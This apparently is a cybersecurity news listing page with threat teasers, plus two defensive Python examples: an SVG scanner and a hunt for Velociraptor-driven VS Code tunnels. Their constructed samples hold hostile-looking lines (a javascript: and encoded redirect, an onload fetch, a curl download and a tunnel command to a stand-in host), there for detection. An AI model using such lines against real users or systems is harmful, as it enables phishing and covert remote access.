Red Hot Cyber
Cybersecurity is about sharing. Recognize the risk, combat it, share your experiences, and encourage others to do better than you.

Author: Redazione RHC

LECS powered by Cyber Evolution: the first NDR black box made entirely in Italy

In the current cybersecurity landscape, threats are becoming faster and more sophisticated. Traditional defense tools no longer guarantee complete visibility, especially when an attack leaves no obvious traces on endpoints or relies on fileless techniques. This is where Network Detection and Response (NDR) comes in: a class of technology designed to detect anomalous behavior in network traffic and trigger countermeasures. But what exactly is an NDR? How does it work? And why is it an increasingly crucial component of a corporate security strategy?

What is Network Detection and Response

Network Detection and Response is an

AI A2 detected 102 0-day bugs and created exploits in Android apps for $1.77

Artificial intelligence systems have been criticized for producing confusing vulnerability reports and flooding open-source maintainers with irrelevant submissions. Researchers at Nanjing University and the University of Sydney offer a counterexample: they presented an agent called A2 that finds and verifies vulnerabilities in Android applications, mimicking the workflow of a bug hunter. The work continues the earlier A1 project, which was able to exploit bugs in smart contracts. The authors claim that A2 achieved 78.3% coverage on the Ghera benchmark suite, outperforming the static analyzer APKHunt, which reached only 30%. Run on 169 real

Figure 02, the robot that loads the dishwasher with precision

California-based company Figure has announced another milestone for its humanoid Figure 02: the robot loaded a dishwasher with high precision using the general-purpose Helix model, built on a Vision-Language-Action (VLA) architecture. A task that is trivial for humans becomes, for an artificial assistant, a demanding test of precision, grip force, and adaptation to objects of different shapes. What stands out is that no new logic or task-specific algorithm was written for it: the result rests on the same general Helix system that has already demonstrated its capabilities in other scenarios. Thanks to additional data and learning from examples of human

If Flash is dead, here’s the SVG Assassin! Phishing 2.0 is in high definition.

Cybercriminals have launched a new wave of attacks that use SVG files to deliver phishing pages. Experts at VirusTotal report that attackers are impersonating the Colombian prosecutor's office, distributing email attachments with JavaScript hidden inside the SVG. Automated analysis surfaced behavior that antivirus engines failed to detect. The SWF format, formally "dead" since Flash was retired in 2020, also continues to appear in traffic: in 30 days VirusTotal received 47,812 previously unseen unique SWF files, and 466 of them triggered at least one antivirus engine. In one case only three of 63 engines flagged the file as "suspicious", pointing to an old vulnerability, but detailed analysis
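An SVG is XML, so the "hidden JavaScript" the teaser describes has only a handful of places to live: a script element, an on* event-handler attribute, a javascript: or data: URI in an href, a SMIL set/animate element that rewrites a handler, or a foreignObject/iframe that embeds HTML. The following triage script is an added example written for this page, not code from VirusTotal or the campaign's samples; it flags each of those mechanisms, falls back to a raw-text scan when the XML is deliberately malformed, and looks for common obfuscation helpers. The sample SVGs are constructed for illustration, and the script uses only the standard library (for untrusted input at scale, defusedxml is the safer parser).

```python
"""Static triage of SVG files for embedded active content (added example)."""
import re
import xml.etree.ElementTree as ET

# Elements that execute or embed foreign content inside an SVG.
EMBED_TAGS = {"script", "foreignObject", "iframe", "embed", "object"}
# Attributes whose value is a URI the renderer will follow.
URI_ATTRS = {"href", "src", "data"}
EVENT_ATTR = re.compile(r"^on[a-z]+$", re.I)
JS_URI = re.compile(r"^\s*(javascript|vbscript|data)\s*:", re.I)
OBFUSCATION = re.compile(r"\b(atob|unescape|eval|fromCharCode|Function)\s*\(", re.I)
# Raw-text fallback used only when the file does not parse as XML.
RAW_ACTIVE = re.compile(r"(<script\b|\bon[a-z]+\s*=|javascript\s*:)", re.I)
ACTIVE_KINDS = {"element", "handler", "uri", "anim", "raw"}


def _local(name: str) -> str:
    """Strip the XML namespace prefix ({ns}name -> name)."""
    return name.rsplit("}", 1)[-1]


def scan_svg(data: bytes) -> dict:
    """Return {"verdict": clean|suspicious|active, "findings": [...]}."""
    findings = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:  # malformed on purpose is itself a signal
        root = None
        findings.append(f"parse-error:{exc}")

    if root is not None:
        for el in root.iter():
            tag = _local(el.tag)
            if tag in EMBED_TAGS:
                findings.append(f"element:{tag}")
            if tag in ("set", "animate"):
                # SMIL can write an event handler or href without any on* attribute.
                target = el.get("attributeName", "")
                if EVENT_ATTR.match(target) or target in URI_ATTRS:
                    findings.append(f"anim:{tag}->{target}")
            for attr, value in el.attrib.items():
                name = _local(attr)  # handles xlink:href as well as href
                if EVENT_ATTR.match(name):
                    findings.append(f"handler:{name}")
                elif name in URI_ATTRS:
                    if JS_URI.match(value):
                        findings.append(f"uri:{value[:40]}")
                    elif value.lower().startswith(("http://", "https://")):
                        findings.append(f"remote:{value}")

    text = data.decode("utf-8", errors="replace")
    if root is None:
        findings += [f"raw:{m.group(0)}" for m in RAW_ACTIVE.finditer(text)]
    findings += [f"obf:{m.group(1)}" for m in OBFUSCATION.finditer(text)]

    kinds = {f.split(":", 1)[0] for f in findings}
    if kinds & ACTIVE_KINDS:
        verdict = "active"
    elif kinds:
        verdict = "suspicious"  # only remote refs, parse errors or obfuscation hints
    else:
        verdict = "clean"
    return {"verdict": verdict, "findings": findings}


# Constructed samples; example.invalid is a reserved, non-resolving domain.
BENIGN = b"""<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
<rect width="10" height="10" fill="#c00"/></svg>"""

PHISH = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<a xlink:href="javascript:location='https://example.invalid/login'">
<text x="10" y="20">Open the document</text></a>
<script><![CDATA[ window.location = atob("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQv"); ]]></script>
</svg>"""

SMIL = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image width="1" height="1" xlink:href="https://example.invalid/t.png"/>
<set attributeName="onload" to="fetch('https://example.invalid/c')"/>
</svg>"""

MALFORMED = b"<svg><script>alert(1)</script>"

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("phish", PHISH),
                        ("smil", SMIL), ("malformed", MALFORMED)):
        print(label, scan_svg(blob))
```

The verdict is deliberately coarse: anything that can execute or redirect is "active" regardless of how it is encoded, while remote references and obfuscation helpers alone only raise "suspicious", so a legitimate animated logo with an external image is not treated like the phishing sample.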

The Dark Side of Windows Drivers: How to Steal Data While Ignoring EDR

A recent study by Workday's Offensive Security team documents a vulnerable Windows driver that can be abused to bypass Endpoint Detection and Response (EDR) tools. The technique relies on reading the disk directly, sidestepping file ACLs, exclusive file locks and, according to the study, protections such as Virtualization-Based Security (VBS) and Credential Guard. The driver in question, eudskacs.sys, exposes a simple interface that lets a caller read raw sectors from the physical disk, so sensitive files can be copied without ever opening them through the file system. As with any bring-your-own-vulnerable-driver technique, the attacker first has to get the driver loaded on the target, which makes driver blocklisting the natural control. Windows normally layers several defenses over such data: the SAM and SYSTEM registry hives that hold credential material, for example, are protected by Access Control Lists (ACLs) and exclusive locks that

Zero-day vulnerability affecting TP-Link routers: what to know until the patch is released

A new zero-day vulnerability has been discovered affecting several TP-Link router models. The issue, a buffer overflow in the CPE WAN Management Protocol (CWMP, also known as TR-069) implementation, could allow an attacker to execute arbitrary code and redirect DNS requests to rogue servers. The flaw was reported by an independent researcher known by the handle Mehrun (ByteRay) on May 11, 2024. TP-Link has confirmed it and is working on updates. At the time of writing the fix is available only for European firmware versions; the rollout for the US and other regions is ongoing. The vulnerability resides in the

Beyond espionage: “Salt Typhoon” also reportedly targeted Donald Trump

A vast Chinese cyberespionage operation dubbed "Salt Typhoon" was recently described as the most ambitious ever attributed to Beijing. According to the report, the campaign yielded sensitive data on nearly every American, including high-profile figures such as President Donald Trump and Vice President J.D. Vance. The scale of the intrusion confirms the ability of Chinese groups to penetrate deep into international communications networks. The targets are not limited to the United States: Salt Typhoon has compromised telecommunications networks in over 80 countries, showing the global reach of the operation. The choice of telecommunications as a target appears strategic, as it

GhostRedirector: The Black SEO Redirect Campaign That Manipulates Search Engines

A cybercriminal group dubbed GhostRedirector by ESET researchers and linked to the Chinese ecosystem has quietly run a global search engine manipulation scheme built on compromised Windows hosts. According to telemetry and internet scans from June, at least 65 servers in several countries have been compromised. The first confirmed infections date to December, but related samples point to activity since at least August 2024, so this is not a sudden outbreak but a long-running campaign with established roles and infrastructure. At its core are two purpose-built components. Rungan is a passive backdoor written in C++ that, once activated, accepts

Windows: Security updates cause problems with UAC and app installation

Microsoft has confirmed that the August 2025 Windows security updates can cause unexpected User Account Control (UAC) prompts and failures when installing apps. The issue affects non-administrator users on all supported versions of Windows. It stems from the patch for an elevation-of-privilege vulnerability in Windows Installer (CVE-2025-50173), which allowed authenticated attackers to obtain SYSTEM privileges. To close it, Microsoft added UAC prompts that require administrator credentials in several situations in order to block potential privilege escalation. In some scenarios these prompts appear when running MSI repair commands (such as msiexec

Attackers are using Velociraptor for cyberattacks. Rapid7 is aware

Sophos security specialists have drawn attention to a cyberattack in which unknown attackers used the open-source digital forensics and incident response tool Velociraptor to monitor endpoints. "In this incident, attackers used a tool to download and run Visual Studio Code with the likely intent of creating a tunnel to a command-and-control server," said experts at the Sophos Counter Threat Unit. The report emphasizes that attackers routinely rely on "living-off-the-land" (LotL) tactics and use legitimate remote monitoring and management tools in attacks, but the use of Velociraptor marks an evolution of the approach, with incident response software itself being misused for malicious purposes. Analysis of the incident showed that the
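The chain the teaser describes (a Velociraptor client that is not the organization's own, which then downloads VS Code and starts a tunnel) is easy to express as a small set of correlated rules over endpoint telemetry. The hunt below is an added example written for this page, not code from the Sophos report: it evaluates Sysmon-style process-creation (EventID 1) and DNS-query (EventID 22) records and groups hits per host. The field names mirror Sysmon's; the sample events are constructed; and the sanctioned Velociraptor install path, the VS Code binary names and the tunnel relay domain are assumptions to adjust for your environment.

```python
"""Hunt for the Velociraptor -> VS Code tunnel pattern (added example)."""
import re
from collections import defaultdict

# Assumption: where a sanctioned Velociraptor client lives on this estate.
SANCTIONED_VELO_DIRS = ("c:\\program files\\velociraptor\\",)
# Assumption: binary names the VS Code CLI/desktop use on Windows.
VSCODE_BINARIES = {"code.exe", "code-tunnel.exe"}
# Assumption: relay domain used by VS Code tunnels; verify against current docs.
TUNNEL_DOMAIN = re.compile(r"(^|\.)tunnels\.api\.visualstudio\.com$", re.I)
DOWNLOADERS = {"powershell.exe", "cmd.exe", "curl.exe", "bitsadmin.exe", "certutil.exe"}


def _base(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate_process(ev: dict) -> list:
    """Rule names that fire for one process-creation event."""
    hits = []
    image, parent = _base(ev.get("Image", "")), _base(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    if image == "velociraptor.exe" and not ev.get("Image", "").lower().startswith(SANCTIONED_VELO_DIRS):
        hits.append("velociraptor_unexpected_path")
    if image in VSCODE_BINARIES and re.search(r"\btunnel\b", cmd, re.I):
        hits.append("vscode_tunnel_started")
        if parent == "velociraptor.exe":
            hits.append("tunnel_spawned_by_velociraptor")
    if parent == "velociraptor.exe" and image in DOWNLOADERS:
        hits.append("velociraptor_spawned_downloader")
    return hits


def evaluate_dns(ev: dict) -> list:
    """Rule names that fire for one DNS-query event."""
    return ["vscode_tunnel_dns"] if TUNNEL_DOMAIN.search(ev.get("QueryName", "")) else []


def hunt(events: list) -> dict:
    """Correlate rule hits per host and assign a severity."""
    per_host = defaultdict(set)
    for ev in events:
        host = ev.get("Computer", "?")
        if ev.get("EventID") == 1:
            per_host[host].update(evaluate_process(ev))
        elif ev.get("EventID") == 22:
            per_host[host].update(evaluate_dns(ev))
    report = {}
    for host, hits in per_host.items():
        if not hits:
            continue
        tunnel = hits & {"vscode_tunnel_started", "vscode_tunnel_dns"}
        velo = hits & {"velociraptor_unexpected_path", "velociraptor_spawned_downloader"}
        if "tunnel_spawned_by_velociraptor" in hits or (tunnel and velo):
            severity = "critical"  # tunnel evidence tied to an unexpected Velociraptor
        elif tunnel:
            severity = "high"      # a tunnel alone still warrants a look
        else:
            severity = "medium"
        report[host] = {"severity": severity, "rules": sorted(hits)}
    return report


# Constructed sample telemetry: one benign developer host, one compromised server.
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "WS-DEV01", "Image": r"C:\Program Files\Velociraptor\velociraptor.exe",
     "ParentImage": r"C:\Windows\System32\services.exe", "CommandLine": "velociraptor.exe service run"},
    {"EventID": 1, "Computer": "WS-DEV01", "Image": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": '"Code.exe" C:\\src\\app'},
    {"EventID": 1, "Computer": "SRV-FILE02", "Image": r"C:\Windows\Temp\velociraptor.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "velociraptor.exe --config client.yaml client"},
    {"EventID": 1, "Computer": "SRV-FILE02", "Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\Temp\velociraptor.exe", "CommandLine": "curl.exe -o vscode.zip https://example.invalid/vscode.zip"},
    {"EventID": 1, "Computer": "SRV-FILE02", "Image": r"C:\Windows\Temp\vscode\code.exe",
     "ParentImage": r"C:\Windows\Temp\velociraptor.exe", "CommandLine": "code.exe tunnel --accept-server-license-terms --name srv-file02"},
    {"EventID": 22, "Computer": "SRV-FILE02", "Image": r"C:\Windows\Temp\vscode\code.exe",
     "QueryName": "global.rel.tunnels.api.visualstudio.com"},
]

if __name__ == "__main__":
    for host, result in hunt(SAMPLE_EVENTS).items():
        print(host, result)
```

The developer workstation produces no alert because its Velociraptor client runs from the sanctioned path and VS Code is launched without the tunnel subcommand; the server is rated critical because the tunnel process is a direct child of a Velociraptor binary running from a temp directory. Tune the sanctioned path and the allowed hosts before relying on the "unexpected path" rule, since that is where the false positives will come from.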